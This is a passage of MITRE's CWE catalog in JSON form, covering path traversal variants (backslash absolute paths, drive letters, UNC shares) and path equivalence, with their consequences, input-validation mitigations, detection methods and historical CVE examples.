weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/absolute/pathname/here"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Slash Absolute Path - /absolute/pathname/here","attr":{"@_Date":"2008-04-11"}}}},"38":{"attr":{"@_ID":"38","@_Name":"Path Traversal: \'\\\\absolute\\\\pathname\\\\here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a backslash absolute path (\'\\\\absolute\\\\pathname\\\\here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\absolute\\\\pathname\\\\here (\'backslash absolute path\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Backslash Absolute Path - \\\\absolute\\\\pathname\\\\here","attr":{"@_Date":"2008-04-11"}}}},"39":{"attr":{"@_ID":"39","@_Name":"Path Traversal: \'C:dirname\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a drive letter or Windows volume letter (\'C:dirname\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged system information by specifying arbitrary paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'C:dirname\' or C: (Windows volume or \'drive letter\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Drive Letter or Windows Volume - \'C:dirname\'","attr":{"@_Date":"2008-04-11"}}}},"40":{"attr":{"@_ID":"40","@_Name":"Path Traversal: \'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC Share)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a Windows UNC share (\'\\\\\\\\UNC\\\\share\\\\name\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC share)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "Filelike Objects", Page 664"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows UNC Share - \'\\\\\\\\UNC\\\\share\\\\name\\\\\'","attr":{"@_Date":"2008-04-11"}}}},"41":{"attr":{"@_ID":"41","@_Name":"Improper Resolution of Path Equivalence","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system or application is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object.","Extended_Description":"Path equivalence is usually employed in order to circumvent access controls expressed using an incomplete set of file name or file path representations. This is different from path traversal, wherein the manipulations are performed to generate a name for a different object.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing 